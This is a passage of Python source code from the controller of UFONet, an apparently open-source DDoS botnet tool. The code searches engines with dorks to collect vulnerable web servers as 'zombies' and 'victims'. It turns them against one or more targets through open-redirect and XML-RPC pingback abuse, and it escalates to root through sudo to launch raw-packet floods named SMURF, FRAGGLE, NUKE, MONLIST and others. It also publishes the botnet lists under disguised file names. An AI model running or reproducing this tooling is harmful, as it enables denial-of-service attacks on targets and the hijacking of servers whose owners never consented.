print(" |===|o|=========/ \========|o|===| ")
print(" | | | \() ()/ | | | ")
print(" |===|o|======{'-.) A (.-'}=====|o|===| ")
print(" | __/ \__ '-.\\uuu/.-' __/ \__ | ")
print(" |==== .'.'^'.'.====|====.'.'^'.'.====| ")
print(" | _\o/ __ {.' __ '.} _ _\o/ _| ")
print(" '''''''''''''''''''''''''''''''''''''' ")
print("\n + UFONet Crypter (AES256+HMAC-SHA1)")
print(" (140 plain text chars = 69 encrypted chars)\n")
print(" " + '='*44 + "\n")
text = str(input("-> Enter TEXT: "))
input_key = str(input("\n-> Enter KEY: "))
key = base64.b64encode(input_key.encode('utf-8')).decode('utf-8')
c = Cipher(key, text)
msg = c.encrypt()
msg = msg.decode('utf-8')
c.set_text(msg)
print("\n" + " " + '-'*44)
print('\n-> Ciphertext: [', msg, ']')
print('\n-> Length:', len(msg))
print("\n" + " " + '-'*44)
print('\n-> Key (share it using SNEAKNET!):', input_key)
print('\n-> Decryption PoC:', c.decrypt().decode('utf-8'), "\n")
# run shownet tool
if options.shownet:
hex_mac = self.show_mac_address()
self.banner()
print("-> Network Info:")
print('='*44)
print("-"*35)
print("|- MAC Address :", hex_mac)
print("|" +"-"*34)
private_ip, public_ip = self.show_ips()
print("|- IP Private :", private_ip)
print("|" +"-"*34)
t = urlparse(self.check_ip_service3)
name_service = t.netloc
print("|- IP Public :", public_ip +" | ["+name_service+"]")
print("-"*35)
print('='*75, "\n")
# run UFOSCAN tool (check EUID when running UFOSCAN)
if options.xray:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOSCAN] (--xray) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running
else:
if not options.xrayps:
options.xrayps = str("1-1024") # default scanning ports (1-1024)
ports = options.xrayps
try:
portX, portY = ports.split('-')
try:
portX = int(portX)
portY = int(portY)
except:
portX = 1
portY = 1024
print("[Error] [AI] [UFOSCAN] Something wrong with range of ports selected. Using by default: 1-1024...\n")
except:
portX = 1
portY = 1024
print("[Info] [AI] [UFOSCAN] Not any range of ports selected. Using by default: 1-1024...\n")
self.banner()
print("\n[AI] Analizing target to extract interesting information... Be patient!\n")
print('='*22 + '\n')
try:
self.instance = UFOSCAN() # instance main class for scanning operations
xray = self.instance.scanning(options.xray, portX, portY)
except Exception as e:
print ("[Error] [AI] Something wrong scanning... Not any data stream found! -> [Exiting!]\n")
if DEBUG == True:
traceback.print_exc()
return
# show code timeline
if options.timeline:
f = open(self.timeline_file, 'r')
releases = f.readlines()
f.close()
self.banner()
print("-> Code timeline:")
print('='*44)
print("-"*35)
for r in releases:
print(r.strip('\n'))
print("-"*35)
print('='*75, "\n")
# print some examples
if options.examples:
f = open(self.examples_file, 'r')
examples = f.readlines()
f.close()
self.banner()
for e in examples:
print(e.strip('\n'))
# check EUID when running UFOSYN (root required for open 'raw sockets') / GUI will invoke 'sudo' directly
if options.ufosyn:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOSYN] (--ufosyn) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFOSYN will fail
# check EUID when running SPRAY (root required)
if options.spray:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [SPRAY] (--spray) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but SPRAY will fail
# check EUID when running SMURF (root required)
if options.smurf:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [SMURF] (--smurf) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but SMURF will fail
# check EUID when running FRAGGLE (root required)
if options.fraggle:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [FRAGGLE] (--fraggle) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but FRAGGLE will fail
# check EUID when running XMAS (root required)
if options.xmas:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [XMAS] (--xmas) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but XMAS will fail
# check EUID when running UFOACK (root required)
if options.ufoack:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOACK] (--ufoack) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFOACK will fail
# check EUID when running UFORST (root required)
if options.uforst:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFORST] (--uforst) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFORST will fail
# check EUID when running DROPER (root required)
if options.droper:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [DROPER] (--droper) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but DROPER will fail
# check EUID when running OVERLAP (root required)
if options.overlap:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [OVERLAP] (--overlap) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but OVERLAP will fail
# check EUID when running PINGER (root required)
if options.pinger:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [PINGER] (--pinger) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but PINGER will fail
# check EUID when running UFOUDP (root required)
if options.ufoudp:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [UFOUDP] (--ufoudp) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but UFOUDP will fail
# check EUID when running NUKE (root required)
if options.nuke:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [NUKE] (--nuke) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but NUKE will fail
# check EUID when running TACHYON (root required)
if options.tachyon:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [TACHYON] (--tachyon) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but TACHYON will fail
# check EUID when running MONLIST (root required)
if options.monlist:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [MONLIST] (--monlist) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but MONLIST will fail
# check EUID when running SNIPER (root required)
if options.sniper:
euid = self.checkeuid()
if euid != 0:
print("[Info] [AI] [Control] [SNIPER] (--sniper) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass # keep running, but SNIPER will fail
# search for [Zombies] on search engines results (dorking)
if options.search:
zombies = []
if options.engine:
engine = options.engine
else:
engine = "duck" # default search engine
try:
self.banner()
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r')
restored = lf.readlines()
zombies_restored = len(restored)
lf.close()
lz = open(self.zombies_file, 'r')
zombies_army = lz.readlines()
for zombie in zombies_army:
zombies.append(zombie) # add zombies from army to the zombies pool
lz.close()
if len(restored) > 0:
print("\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
if not self.options.forceyes:
backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
print('-'*25)
else:
backup_reply = "Y"
if backup_reply == "n" or backup_reply == "N":
print("\n[Info] [AI] Removing data stored and starting a new search...\n")
os.remove(self.humans_file)
zombies_restored = 0 # flush zombies restored
print('-'*25 + "\n")
else:
print("\n[Info] [AI] Restoring data and starting a new search...\n")
print('-'*25 + "\n")
for zombie in restored:
zombies.append(zombie) # add previous data to zombies pool
if options.allengines:
if options.ex_engine: # exclude some search engines manually
exclude = options.ex_engine.split(",")
for ex in exclude:
ex = ex.lower()
if ex in self.search_engines:
if len(self.search_engines) == 1: # at least one should make it
pass
else:
self.search_engines.remove(ex)
for e in self.search_engines:
engine = e
print('='*44)
print(("\n[AI] Searching for zombies using: "+engine+'\n'))
print('='*44 + '\n')
self.options.engine = engine
try:
zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
if zombies_chain != None:
for zombie in zombies_chain:
if zombie not in zombies: # evade possible repetitions
zombies.append(zombie)
except:
if zombies: # backup all new zombies found to file in case of exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
else:
if restored:
print('='*44)
print(("\n[AI] Searching for zombies using: "+engine+"\n"))
print('='*44 + '\n')
if restored: # from restored file
try:
zombies_chain = self.search_zombies(dork='', zombies_found=zombies)
if zombies_chain != None:
for zombie in zombies_chain:
if zombie not in zombies: # evade possible repetitions
zombies.append(zombie)
except:
if zombies: # backup all new zombies found to file in case of exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
else:
try:
zombies = self.search_zombies(dork='', zombies_found=zombies)
except:
if zombies: # backup all new zombies found to file in case of exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
total_restored = zombies_restored
new_zombies = 0 # new zombies counter
f = open(self.zombies_file, 'r')
zz = f.readlines()
f.close()
zombies_found = []
for z in zombies:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz and z+os.linesep not in zz:
new_zombies = new_zombies + 1
zombies_found.append(z)
print('='*62)
print("\n- Victims found:", len(zombies_found), "\n")
print(" - Restored:", total_restored)
print(" - Dorked:", abs(len(zombies_found) - total_restored), "\n")
print('-'*32)
print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
print('='*62 + '\n')
if len(zombies) > 0:
if not self.options.forceyes:
check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
print('-'*25)
else:
check_backup_reply = "Y"
if check_backup_reply == "n" or check_backup_reply == "N":
if os.path.isfile(self.humans_file):
os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
print("\n[Info] [AI] Temporal data correctly removed...\n")
else:
with open(self.humans_file, "w") as f:
for z in zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz or z+os.linesep not in zz:
f.write(z+os.linesep)
f.close()
print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
print('-'*25 + "\n")
if new_zombies and new_zombies > 0:
if not self.options.forceyes:
check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
print('-'*25 + "\n")
else:
check_url_link_reply = "Y"
if check_url_link_reply == "n" or check_url_link_reply == "N":
print("[AI] "+self.exit_msg+"\n")
pass
else:
print("\n" + '='*44)
test = self.testing(zombies_found)
else:
print("[Info] [AI] NOT any NEW possible zombies found -> [Exiting!]\n")
except Exception:
print(("\n[Error] [AI] Something wrong searching using: "+engine+"\n"))
# search for [Zombies] from a list of [Dorks]
if options.dorks:
if options.engine:
engine = options.engine
else:
engine = "duck" # default search engine
try:
dorks = self.extract_dorks()
if not dorks:
return
zombies = []
self.banner()
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r')
restored = lf.readlines()
zombies_restored = len(restored)
lf.close()
lz = open(self.zombies_file, 'r')
zombies_army = lz.readlines()
for zombie in zombies_army:
zombies.append(zombie) # add zombies from army to the zombies pool
lz.close()
if len(restored) > 0:
print("\n[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
if not self.options.forceyes:
backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
print('-'*25)
else:
backup_reply = "Y"
if backup_reply == "n" or backup_reply == "N":
print("\n[Info] [AI] Removing data stored and starting a new search...\n")
os.remove(self.humans_file)
zombies_restored = 0 # flush zombies restored
print('-'*25 + "\n")
else:
print("\n[Info] [AI] Restoring data and starting a new search...\n")
print('-'*25 + "\n")
for zombie in restored:
zombies.append(zombie) # add previous data to zombies pool
total_restored = zombies_restored
if options.allengines:
if options.ex_engine: # exclude some search engines manually
exclude = options.ex_engine.split(",")
for ex in exclude:
ex = ex.lower()
if ex in self.search_engines:
if len(self.search_engines) == 1: # at least one should make it
pass
else:
self.search_engines.remove(ex)
for e in self.search_engines:
engine = e
print('='*44)
print(("\n[AI] Searching for zombies using: ["+engine+ "] from a list of [Dorks]\n"))
print('='*44 + '\n')
self.options.engine = engine
for dork in dorks:
print('='*22)
print("Dork:", dork)
print('='*22 + '\n')
try:
dorked_zombies = self.search_zombies(dork, zombies) # AI mode
for zombie in dorked_zombies:
if zombie not in zombies: # evade repetitions for zombies found
zombies.append(zombie)
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
except:
if zombies: # backup new zombies found on exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
else:
if restored:
print('='*44)
print(("\n[AI] Searching for zombies using: ["+ engine+ "] from a list of [Dorks]\n"))
print('='*44 + '\n')
for dork in dorks:
print('='*22)
print("Dork:", dork)
print('='*22 + '\n')
try:
dorked_zombies = self.search_zombies(dork, zombies) # AI mode
if dorked_zombies != None:
for zombie in dorked_zombies:
if zombie not in zombies: # evade repetitions for zombies found
zombies.append(zombie)
except:
if zombies: # backup new zombies found on exception
for zombie in zombies:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
new_zombies = 0 # new zombies counter
f = open(self.zombies_file, 'r')
zz = f.readlines()
f.close()
zombies_found = []
for z in zombies:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz and z+os.linesep not in zz:
new_zombies = new_zombies + 1
zombies_found.append(z)
print('='*62)
print("\n- Victims found:", len(zombies_found), "\n")
print(" - Restored:", total_restored)
print(" - Dorked:", len(zombies_found) - total_restored, "\n")
print('-'*32)
print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
print('='*62 + '\n')
if len(zombies_found) > 0:
if not self.options.forceyes:
check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
print('-'*25)
else:
check_backup_reply = "Y"
if check_backup_reply == "n" or check_backup_reply == "N":
if os.path.isfile(self.humans_file):
os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
print("\n[Info] [AI] Temporal data correctly removed...\n")
else:
with open(self.humans_file, "w") as f:
for z in zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz or z+os.linesep not in zz:
f.write(z+os.linesep)
f.close()
print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
print('-'*25 + "\n")
if new_zombies and new_zombies > 0:
if not self.options.forceyes:
check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
print('-'*25 + "\n")
else:
check_url_link_reply = "Y"
if check_url_link_reply == "n" or check_url_link_reply == "N":
print("[AI] "+self.exit_msg+"\n")
pass
else:
print("\n" + '='*44)
test = self.testing(zombies_found)
else:
print("[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n")
except Exception:
print(("\n[Error] [AI] Something wrong searching using: "+engine+"\n"))
# auto-search for [Zombies] (dorks+all_engines+time -> to discover max new zombies)
if options.autosearch:
try:
dorks = self.extract_dorks()
except:
print("\n[Info] [AI] Not any dork present at: 'botnet/dorks.txt' -> [Aborting!]\n")
return
engines_list = self.search_engines
stop_flag = False # use a flag to establish an end
try:
self.banner()
print("\n[AI] Searching automatically for [Zombies] (WARNING: this may take several time!)\n")
print("[Info] Try to use CTRL+z (on shell) to STOP IT! ;-)\n")
print('-'*25 + "\n")
zombies_found = []
lz = open(self.zombies_file, 'r')
zombies_army = lz.readlines()
for zombie in zombies_army:
zombies_found.append(zombie) # add zombies from army to the zombies found pool
lz.close()
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r')
restored = lf.readlines()
zombies_restored = len(restored)
lf.close()
if len(restored) > 0:
print("[Info] [AI] You have [" + str(len(restored)) + " possible zombies] stored from a previous search...\n")
if not self.options.forceyes:
backup_reply = input("[AI] Do you want to resume it? (NOTE: If not, this DATA will be REMOVED) (Y/n)\n")
print('-'*25)
else:
backup_reply = "Y"
if backup_reply == "n" or backup_reply == "N":
print("\n[Info] [AI] Removing data stored and starting a new (auto)search...\n")
os.remove(self.humans_file)
zombies_restored = 0 # flush zombies restored
print('-'*25 + "\n")
else:
print("\n[Info] [AI] Restoring data and starting a new (auto)search...\n")
print('-'*25 + "\n")
for zombie in restored:
zombies_found.append(zombie) # add previous data to zombies found pool
total_restored = zombies_restored
while stop_flag == False:
if not os.path.exists(self.humans_file) == True:
f = open(self.humans_file, 'w')
f.close()
lf = open(self.humans_file, 'r') # read it on each iteration to update changes
restored = lf.readlines()
lf.close()
zombies_restored = len(restored)
for e in engines_list:
zombies_counter = 0 # use it also as (engine) flag
engine = e
self.options.engine = engine
print('='*44 + '\n')
print(("[AI] Searching for zombies using: "+engine+'\n'))
print('='*44 + '\n')
for dork in dorks:
print('='*22)
print("Dork:", dork)
print('='*22 + '\n')
try:
dorked_zombies = self.search_zombies(dork, zombies_found) # AI mode
for zombie in dorked_zombies:
if zombie not in zombies_found: # evade repetitions for zombies found
zombies_found.append(zombie)
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
zombies_counter = zombies_counter + 1
except:
if zombies_found: # backup new zombies found on exception
for zombie in zombies_found:
if zombie+os.linesep not in restored: # only append new zombies found
with open(self.humans_file, "a") as f:
f.write(str(zombie+os.linesep))
f.close()
if zombies_counter == 0:
print("[Info] [AI] NOT more NEW victims found (by the moment) using: "+engine+" -> [Discarding!]\n")
print('-'*25 + "\n")
engines_list.remove(engine) # remove not more results engine from search engines list
if not engines_list: # if search engines empty, call return-exit routine
print("[Info] [AI] Search engines aren't providing more results -> [Exiting!]\n")
print('-'*25 + "\n")
stop_flag = True # exit flag up
new_zombies = 0 # new zombies counter
f = open(self.zombies_file, 'r')
zz = f.readlines()
f.close()
all_zombies_found = []
for z in zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz and z+os.linesep not in zz:
new_zombies = new_zombies + 1
all_zombies_found.append(z)
print('='*62)
print("\n- Victims found:", len(all_zombies_found), "\n")
print(" - Restored:", total_restored)
print(" - Dorked:", len(all_zombies_found) - total_restored, "\n")
print('-'*32)
print("\n- NEW possible zombies (NOT present in your army):", new_zombies, "\n")
print('='*62 + '\n')
if len(zombies_found) > 0:
if not self.options.forceyes:
check_backup_reply = input("[AI] Do you want to save the results for a future search? (Y/n)\n")
print('-'*25)
else:
check_backup_reply = "Y"
if check_backup_reply == "n" or check_backup_reply == "N":
if os.path.isfile(self.humans_file):
os.remove(self.humans_file) # remove search backup file (keeping love from shadows!)
print("\n[Info] [AI] Temporal data correctly removed...\n")
else:
with open(self.humans_file, "w") as f:
for z in all_zombies_found:
if z.endswith(os.linesep):
z = z.replace(os.linesep, "")
if z not in zz or z+os.linesep not in zz:
f.write(z+os.linesep)
f.close()
print("\n[Info] [AI] Correctly saved at: 'botnet/humans.txt'\n")
print('-'*25 + "\n")
if new_zombies and new_zombies > 0:
if not self.options.forceyes:
check_url_link_reply = input("[AI] Do you want to check if NEW possible zombies are valid? (Y/n)\n")
print('-'*25 + "\n")
else:
check_url_link_reply = "Y"
if check_url_link_reply == "n" or check_url_link_reply == "N":
print("[AI] "+self.exit_msg+"\n")
pass
else:
print("\n" + '='*44)
test = self.testing(all_zombies_found)
else:
print("[Info] [AI] NOT any NEW possible zombies found! -> [Exiting!]\n")
except Exception:
print ("[Error] [AI] Something wrong (auto)searching...\n")
# test web 'zombie' servers -> show statistics
if options.test:
try:
self.banner()
zombies = self.extract_zombies()
if not zombies:
return
test = self.testing(zombies)
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong testing!\n")
if DEBUG == True:
traceback.print_exc()
# test XML-'rpc' pingback vulnerable servers -> update list
if options.testrpc:
try:
self.banner()
rpcs = self.extract_rpcs()
if not rpcs:
return
testrpc = self.testing_rpcs(rpcs)
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong testing X-RPCs!\n")
if DEBUG == True:
traceback.print_exc()
# check botnet searching for zombies offline
if options.testoffline:
try:
self.banner()
testbotnet = self.testing_offline()
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong checking for offline [Zombies]!\n")
if DEBUG == True:
traceback.print_exc()
# check ALL botnet status
if options.testall:
try:
self.banner()
test_all_botnet = self.testing_all()
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong testing ALL botnet status!\n")
if DEBUG == True:
traceback.print_exc()
# attack target -> exploit Open Redirect massively and conduct vulnerable servers to a single target
if options.target:
try:
self.banner()
zombies = self.extract_zombies()
if not zombies:
return
options.target = self.parse_url_encoding(options.target) # parse for proper url encoding
attack = self.attacking(zombies, options.target)
self.update_missions_stats() # update mothership missions stats
except Exception:
print ("\n[Error] [AI] Something wrong attacking!\n")
if DEBUG == True:
traceback.print_exc()
# attack a list of targets -> exploit Open Redirect massively and conduct vulnerable servers to multiple targets
if options.target_list:
try:
self.banner()
zombies = self.extract_zombies()
if not zombies:
return
targets = self.extract_target_list()
if not targets:
print("\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n")
return
self.options.forceyes = True # force-yes ON!
self.num_target_list = 0
print("\n[AI] Checking integrity of targets...\n")
for t in targets: # start of code block dedicated to: Guido van Rossum [23/12/2018]
if not t.startswith("http"): # discarded inmediately
print("[Info] [AI] [Control] " + str(t) + " -> [Discarding!]")
targets.remove(t) # ¿remove? invalid targets
print("")
c = 0
for target in targets:
if target == "":
c = c + 1
else:
self.num_target_list = self.num_target_list + 1
if c == len(targets):
print("\n[Error] [AI] You haven't any valid [Target] to be extracted from: "+str(options.target_list)+" -> [Exiting!]\n")
return # end of code block dedicated to: Guido van Rossum [23/12/2018]
else:
for target in targets:
self.options.target = self.parse_url_encoding(target) # parse for proper url encoding
target = self.options.target
print('='*55 + "\n")
print("[Info] [AI] Aiming: " + str(target) + " -> [OK!]\n")
print("="*55)
attack = self.attacking(zombies, target)
self.update_missions_stats() # update mothership missions stats (each target counts)
except Exception:
print ("\n[Error] [AI] Something wrong attacking to multiple targets!\n")
if DEBUG == True:
traceback.print_exc()
# inspect target -> inspect target's components sizes
if options.inspect:
try:
self.banner()
print("\n[AI] Inspecting target for local resources... to find the best place to attack... SSssh!\n")
print('='*22 + '\n')
self.instance = Inspector(self) # instance main class for inspection operations
inspection = self.instance.inspecting(options.inspect)
self.update_missions_stats() # update mothership missions stats
except Exception as e:
print ("\n[Error] [AI] Something wrong inspecting... Not any object found!\n")
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# abduct target -> examine target's webserver configuration (banner grabbing, anti-ddos, etc.)
if options.abduction:
try:
self.banner()
print("\n[AI] Abducting target to extract interesting information... Be patient!\n")
print('='*22 + '\n')
self.instance = Abductor(self) # instance main class for abduction operations
abduction = self.instance.abducting(options.abduction)
self.update_missions_stats() # update mothership missions stats
except Exception as e:
print ("\n[Error] [AI] Something wrong abducting... Not any data stream found!\n")
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# attack me -> exploit Open Redirect massively and connect all vulnerable servers to master for benchmarking
if options.attackme:
self.mothership_id = self.mothership_id[:25] # truncating anti-formats ;-)
try:
self.banner()
print("\n[AI] Ordering [Zombies] to attack you for benchmarking ;-)\n")
print("[Warning] You are going to reveal your real IP to [Zombies]!\n")
if not self.options.forceyes:
update_reply = input("[AI] Do you want to continue? (Y/n)")
else:
update_reply = "Y"
if update_reply == "n" or update_reply == "N":
print("\n[Info] [AI] [Control] Aborting 'Attack-Me' test... -> [Exiting!]\n")
return
self.mothership_hash = str(random.getrandbits(128)) # generating random evasion hash
print("\nMothership ID: " + self.mothership_id + "RND: " + self.mothership_hash)
print("\n[AI] Checking NAT/IP configuration:\n")
nat = self.check_nat()
f = open("alien", "w") # generate random alien worker
f.write(str(self.mothership_hash))
f.close()
if self.nat_error_flag == "ON":
return
zombies = self.extract_zombies()
if not zombies:
return
attackme = self.attackme(zombies)
self.update_missions_stats() # update mothership missions stats
except Exception as e:
print ("\n[Error] [AI] Something wrong redirecting [Zombies] against you...\n")
if DEBUG == True:
traceback.print_exc()
return #sys.exit(2)
# check/update for latest stable version
if options.update:
self.banner()
try:
print("\n[AI] Trying to update automatically to the latest stable version\n")
Updater()
except:
print("Not any .git repository found!\n")
print("="*30)
print("\nTo have working this feature, you should clone UFONet with:\n")
print("$ git clone %s" % self.GIT_REPOSITORY)
print("\nAlso you can try this other mirror:\n")
print("$ git clone %s" % self.GIT_REPOSITORY2 + "\n")
# launch GUI/Web interface
if options.web:
self.create_web_interface()
return
# deploy data to share in [/var/www/ufonet]
if options.deploy is not None:
self.banner()
euid = self.checkeuid()
if euid != 0:
print("\n[Info] [AI] [Control] [DEPLOY] (--deploy) not started as root...\n")
try:
args = ['sudo', sys.executable] + sys.argv + [os.environ]
os.execlpe('sudo', *args)
except:
pass
try:
print("\n[AI] Trying to deploy data to share in: '"+self.warping_path+"'\n")
np = r''+self.warping_path+''
if not os.path.exists(np):
os.makedirs(np)
print("[AI] Created folder at: '"+self.warping_path+"'\n")
else:
print("[AI] Path to folder: '"+self.warping_path+"' exists! -> [PASSING!]\n")
from pathlib import Path # import pathlib
import shutil # import shutil
src = 'data/'
files=os.listdir(src)
print("[AI] GUI [Data] has been deployed...\n")
for fname in files:
shutil.copy2(os.path.join(src,fname), self.warping_path)
print(" - "+fname+" -> "+self.warping_path+"/"+fname)
os.chmod(self.warping_path+"/"+fname, self.warping_folder_permissions)
print("")
src2 = 'botnet/'
files=os.listdir(src2)
print("[AI] CORE [Botnet] has been deployed...\n")
for fname in files:
shutil.copy2(os.path.join(src2,fname), self.warping_path)
if fname == 'zombies.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"abductions.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"abductions.txt.gz")
os.chmod(self.warping_path+"/"+"abductions.txt.gz", self.warping_folder_permissions)
if fname == 'aliens.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"troops.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"troops.txt.gz")
os.chmod(self.warping_path+"/"+"troops.txt.gz", self.warping_folder_permissions)
if fname == 'droids.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"robots.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"robots.txt.gz")
os.chmod(self.warping_path+"/"+"robots.txt.gz", self.warping_folder_permissions)
if fname == 'ucavs.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"drones.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"drones.txt.gz")
os.chmod(self.warping_path+"/"+"drones.txt.gz", self.warping_folder_permissions)
if fname == 'rpcs.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"reflectors.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"reflectors.txt.gz")
os.chmod(self.warping_path+"/"+"reflectors.txt.gz", self.warping_folder_permissions)
if fname == 'snmp.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"bosons.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"bosons.txt.gz")
os.chmod(self.warping_path+"/"+"bosons.txt.gz", self.warping_folder_permissions)
if fname == 'ntp.txt':
in_file = self.warping_path+"/"+fname
in_data = open(in_file, "rb").read()
out_gz = self.warping_path+"/"+"crystals.txt.gz"
gzf = gzip.open(out_gz, "wb")
gzf.write(in_data)
gzf.close()
os.unlink(in_file)
print(" - "+fname+" -> "+self.warping_path+"/"+"crystals.txt.gz")
os.chmod(self.warping_path+"/"+"crystals.txt.gz", self.warping_folder_permissions)
